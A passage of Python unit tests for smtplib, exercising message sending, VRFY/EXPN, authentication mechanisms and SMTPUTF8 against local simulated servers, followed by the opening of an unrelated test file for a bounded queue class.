mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# The Resent-Bcc headers are deleted before serialization.
del m['Bcc']
del m['Resent-Bcc']
# Add the X-Peer header that DebuggingServer adds
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: holy@grail.net$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
# Test various operations on an unconnected SMTP object that
# should raise exceptions (at present the attempt in SMTP.send
# to reference the nonexistent 'sock' attribute of the SMTP object
# causes an AttributeError)
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected,
smtp.send, 'test msg')
def testNonnumericPort(self):
# check that non-numeric port raises OSError
self.assertRaises(OSError, smtplib.SMTP,
"localhost", "bogus")
self.assertRaises(OSError, smtplib.SMTP,
"localhost:bogus")
# test response of client to a non-successful HELO message
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b"199 no hello for you!")
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + (b'.' * smtplib._MAXLINE * 2) + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = (self.evt, self.respdata, self.sock)
thread = threading.Thread(target=server, args=servargs)
thread.start()
self.addCleanup(thread.join)
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP,
HOST, self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com':'John A',
'Ms.B@xn--fo-fka.com':'Sally B',
'Mrs.C@somewhereesle.com':'Ruth C',
}
sim_auth = ('Mr.A@somewhere.com', 'somepassword')
sim_cram_md5_challenge = ('PENCeUxFREJoU0NnbmhNWitOMjNGNn'
'dAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1':['Mr.A@somewhere.com','Mrs.C@somewhereesle.com'],
'list-2':['Ms.B@xn--fo-fka.com',],
}
# Simulated SMTP channel & server
class ResponseException(Exception): pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99 # Add protocol state to enable auth testing.
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(
[ "250-{0}\r\n".format(x) for x in extra_features ])
super(SimSMTPChannel, self).__init__(*args, **kw)
# AUTH related stuff. It would be nice if support for this were in smtpd.
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push(
'503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push('504 Command parameter not implemented: unsupported '
' authentication mechanism {!r}'.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\0')
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
' failed: {}'.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
# base64 encoded 'Username:'
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
# base64 encoded 'Password:'
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push('535 Splitting response {!r} into user and password'
'failed: {}'.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(
sim_auth[1].encode('ascii'),
self._decode_base64(sim_cram_md5_challenge).encode('ascii'),
'md5').hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
# end AUTH related stuff.
def smtp_EHLO(self, arg):
resp = ('250-testhost\r\n'
'250-EXPN\r\n'
'250-SIZE 20000000\r\n'
'250-STARTTLS\r\n'
'250-DELIVERBY\r\n')
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
# For max compatibility smtplib should be sending the raw address.
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email], quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count-1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
# Test various SMTP & ESMTP commands/behaviors that require a simulated server
# (i.e., something with more features than DebuggingServer)
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
# smoke test
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
# no features should be present before the EHLO
self.assertEqual(smtp.esmtp_features, {})
# features expected from the test server
expected_features = {'expn':'',
'size': '20000000',
'starttls': '',
'deliverby': '',
'help': '',
}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for addr_spec, name in sim_users.items():
expected_known = (250, bytes('%s %s' %
(name, smtplib.quoteaddr(addr_spec)),
"ascii"))
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = (550, ('No such user: %s' % u).encode('ascii'))
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = (250, bytes('\n'.join(users), "ascii"))
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = (550, b'No access for you!')
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature("AUTH PLAIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature("AUTH LOGIN")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature("AUTH CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
# Test that multiple authentication methods are tried.
self.serv.add_feature("AUTH BOGUS PLAIN LOGIN CRAM-MD5")
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature("AUTH {}".format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
#TODO: add tests for correct AUTH method fallback now that the
#test infrastructure can support it.
# Issue 17498: make sure _rset does not raise SMTPServerDisconnected exception
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
# Issue 5713: make sure close, not rset, is called if we get a 421 error
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost', timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(
smtplib.SMTPNotSupportedError,
smtp.mail, 'John', options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', '')
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
# The base SMTP server turns these on automatically, but our test
# server is set up to munge the EHLO response, so we need to provide
# them as well. And yes, the call is to SMTPServer not SimSMTPServer.
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(
self._extra_features, self, conn, addr,
decode_data=self._decode_data,
enable_SMTPUTF8=self.enable_SMTPUTF8,
)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=None,
rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False,
enable_SMTPUTF8=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m,
mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(
smtp.mail('Jő', options=['BODY=8BITMIME', 'SMTPUTF8']),
(250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
# XXX I don't know why I need two \n's here, but this is an existing
# bug (if it is one) and not a problem with the new functionality.
msg.set_content("oh là là, know what I mean, know what I mean?\n\n")
# XXX smtpd converts received /r/n to /n, so we can't easily test that
# we are successfully sending /r/n :(.
expected = textwrap.dedent("""\
From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink \u1F609
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
""")
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
msg = EmailMessage()
msg['From'] = "Páolo <főo@bar.com>"
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink \u1F609'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost', timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(smtplib.SMTPNotSupportedError,
smtp.send_message(msg))
EXPECTED_RESPONSE = encode_base64(b'\0psu\0doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
# RFC 4954's AUTH command allows for an optional initial-response.
# Not all AUTH methods support this; some require a challenge. AUTH
# PLAIN does those, so test that here. See issue #15014.
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
# AUTH PLAIN <initial-response> with the response base 64
# encoded. Hard code the expected response for the test.
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
# Pick a random unused port by passing 0 for the port number
self.serv = SimSMTPAUTHInitialResponseServer(
(HOST, 0), ('nowhere', -1), decode_data=True)
# Keep a note of what port was assigned
self.port = self.serv.socket.getsockname()[1]
serv_args = (self.serv, self.serv_evt, self.client_evt)
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
# wait until server thread has assigned a port number
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
# indicate that the client is finished
self.client_evt.set()
# wait for the server thread to terminate
self.serv_evt.wait()
self.thread.join()
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port,
local_hostname='localhost', timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(
BadHELOServerTests,
DebuggingServerTests,
GeneralTests,
NonConnectingTests,
SMTPAUTHInitialResponseSimTests,
SMTPSimTests,
TooLongLineTests,
)
if __name__ == '__main__':
test_main()
|
test_stencilflow.py
|
#!/usr/bin/env python3
import multiprocessing as mp
import os
import sys
import json
import unittest
sys.path.append(os.path.dirname(os.path.dirname(__file__)))
TEST_FOLDER = os.path.join(os.path.dirname(__file__), "stencils")
from stencilflow.bounded_queue import BoundedQueue
import dace.dtypes
class BoundedQueueTest(unittest.TestCase):
def test_import(self):
# init
queue = BoundedQueue(name="test", maxsize=5)
# init_queue
collection = [1.0, 2.0, 3.0, 4.0, 5.0]
queue.import_data(collection)
# check size
self.assertEqual(queue.size(), len(collection))
# check if data added in the right order
self.assertEqual(queue.try_peek_last(), collection[len(collection) - 1])
# check exception for overfilling queue
self.assertRaises(RuntimeError, queue.import_data, 6 * [1.0])
def test_enq_deq(self):
# init
queue = BoundedQueue(name="test", maxsize=1, collection=[1.0])
# check size
self.assertEqual(queue.size(), 1)
# empty queue, check element value
self.assertEqual(queue.dequeue(), 1.0)
# check size
self.assertEqual(queue.size(), 0)
# check size
self.assertTrue(queue.is_empty())
# check exception on underflow
self.assertRaises(RuntimeError, queue.dequeue)
# enqueue element
queue.enqueue(1.0)
# check size
self.assertTrue(queue.is_full())
# check exception on overflow
self.assertRaises(RuntimeError, queue.enqueue, 2.0)
def test_try_enq_deq(self):
# init
queue = BoundedQueue(name="test", maxsize=1, collection=[1.0])
# check size
self.assertEqual(queue.size(), 1)
# empty queue, check element value
self.assertEqual(queue.try_dequeue(), 1.0)
# check size
self.assertEqual(queue.size(), 0)
# check size
self.assertTrue(queue.is_empty())
# dequeue from emtpy queue, check return value
